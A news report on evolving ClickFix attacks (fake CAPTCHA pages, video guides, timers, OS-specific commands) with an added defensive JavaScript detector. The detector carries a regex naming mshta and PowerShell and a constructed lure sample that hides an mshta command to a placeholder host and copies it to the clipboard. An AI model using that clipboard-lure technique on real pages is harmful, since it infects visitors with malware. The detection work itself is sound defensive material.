ClickFix malware attacks evolve with multi-OS support, video tutorials
By Bill Toulas
November 6, 2025
09:00 AM
ClickFix attacks have evolved to feature videos that guide victims through the self-infection process, a timer to pressure targets into taking risky actions, and automatic detection of the operating system to provide the correct commands.
In a typical ClickFix attack, the threat actor relies on social engineering to trick users into pasting and executing code or commands from a malicious page.
The lures used may vary from identity verification to software problem solutions. The goal is to make the target execute malware that fetches and launches a payload, usually an information stealer.
Most of the time, these attacks provided text instructions on a web page, but newer versions rely on an embedded video to make the attack less suspicious.
Push Security researchers have spotted this change in recent ClickFix campaigns, where a fake Cloudflare CAPTCHA verification challenge detected the victim’s OS and loaded a video tutorial on how to paste and run the malicious commands.
Through JavaScript, the threat actor can hide the commands and copy them automatically into the user's clipboard, thus reducing the chances of human error.
In the same window, the challenge included a one-minute countdown timer that pressures the victim into taking quick action, leaving little time to verify the authenticity or safety of the verification process.
Adding to the deception is a “users verified in the last hour” counter, making the window appear as part of a legitimate Cloudflare bot check tool.
Advanced ClickFix Cloudflare CAPTCHA with video and timer. Source: Push Security
Although we have seen ClickFix attacks against all major operating systems before, including macOS and Linux, the automatic detection and adjustment of the instructions is a new development.
Push Security reports that these more advanced ClickFix webpages are promoted primarily through malvertising on Google Search.
The threat actors either exploit known flaws in outdated WordPress plugins to compromise legitimate sites and inject their malicious JavaScript into pages, or “vibe-code” sites and use SEO poisoning tactics to rank them higher up in the search results.
Regarding the payloads delivered in these attacks, Push researchers noticed that they depended on the operating system, but included the MSHTA executable on Windows, PowerShell scripts, and various other living-off-the-land binaries.
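For defenders reviewing a suspect page, the traits described above (script-driven clipboard copy, OS detection, a countdown timer, and a command naming MSHTA or PowerShell) can be checked together in page source. The following is an added example, not code from the article or from Push Security; the function names, regexes, the base64 hiding method and both sample pages are constructed assumptions.

```javascript
// Added example: static heuristic for the page traits the article describes.
// Signal names, regexes and both samples are constructed for illustration.
const LOLBIN = /\b(mshta|powershell)(\.exe)?\b\s+\S+/i; // binary plus an argument

// Collect quoted string literals from page script (rough, regex-based).
function stringLiterals(source) {
  const re = /(["'`])((?:\\.|(?!\1)[^\\])*)\1/g;
  return Array.from(source.matchAll(re), (m) => m[2]);
}

// Decode literals that look like base64 (an assumed way of hiding the command).
function maybeBase64(s) {
  if (!/^[A-Za-z0-9+/]{16,}={0,2}$/.test(s)) return null;
  return Buffer.from(s, "base64").toString("utf8");
}

function scoreClickFixPage(source) {
  const literals = stringLiterals(source);
  const candidates = literals.concat(literals.map(maybeBase64).filter(Boolean));
  const signals = {
    clipboardWrite: /navigator\.clipboard\.writeText\s*\(|execCommand\s*\(\s*["']copy["']/.test(source),
    osDetection: /navigator\.(userAgent|platform|userAgentData)\b/.test(source),
    countdownTimer: /setInterval\s*\(/.test(source),
    commandLiteral: candidates.some((s) => LOLBIN.test(s)),
  };
  // Core pattern: script fills the clipboard AND the text invokes a listed binary.
  const core = signals.clipboardWrite && signals.commandLiteral;
  const extras = Number(signals.osDetection) + Number(signals.countdownTimer);
  const verdict = !core ? "clean" : extras === 2 ? "high" : "suspicious";
  return { signals, verdict };
}

// Constructed lure sample: inert placeholder command on a non-resolving domain.
const PAYLOAD_B64 = Buffer.from("mshta https://example.invalid/placeholder").toString("base64");
const SAMPLE_LURE = `
  const os = navigator.userAgent.includes("Windows") ? "win" : "other";
  let left = 60;
  setInterval(() => { left -= 1; }, 1000);
  document.querySelector("#verify").onclick = () =>
    navigator.clipboard.writeText(atob("${PAYLOAD_B64}"));
`;
// Constructed benign sample: an ordinary copy button on a documentation page.
const SAMPLE_DOCS = `
  document.querySelector("#copy").onclick = () =>
    navigator.clipboard.writeText("npm install example-package");
`;
console.log(scoreClickFixPage(SAMPLE_LURE).verdict, scoreClickFixPage(SAMPLE_DOCS).verdict);
```

A legitimate documentation page with a copy button for a PowerShell command would also score "suspicious", so the verdict is a triage signal for review rather than a block decision.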
The researchers speculate that future ClickFix attacks could run entirely in the browser, evading EDR protections.
As ClickFix evolves and takes more convincing and deceptive forms, users should remember that executing code on the terminal can never be a part of any online-based verification process, and no copied commands should ever be executed unless the user fully understands what they do.